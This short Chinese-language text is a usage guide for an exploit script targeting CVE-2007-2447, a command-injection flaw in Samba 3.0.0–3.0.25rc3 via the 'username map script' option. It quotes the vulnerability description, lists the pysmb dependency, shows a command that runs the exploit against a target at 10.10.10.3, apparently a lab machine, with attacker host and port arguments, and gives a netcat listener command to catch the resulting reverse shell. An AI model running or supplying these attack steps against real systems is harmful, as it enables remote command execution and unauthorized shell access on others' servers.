"MS-RPC 功能在 Samba 3.0.0 到 3.0.25rc3 版本的 smbd 中,允许远程攻击者通过 shell 元字符执行任意命令,涉及 (1) SamrChangePassword 函数,当 smb.conf 选项 "username map script" 启用时;并允许远程认证用户通过其他 MS-RPC 函数中的 shell 元字符执行命令,涉及 (2) 远程打印机和 (3) 文件共享管理。"
[*] 此漏洞利用需要 Python 3.7 或更高版本
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- 远程主机--lhost -- 本地主机--lport -- 本地端口--rport -- 远程端口 [*] 可选。默认=445不要忘记启动你的监听器:
nc -lvnp 4444
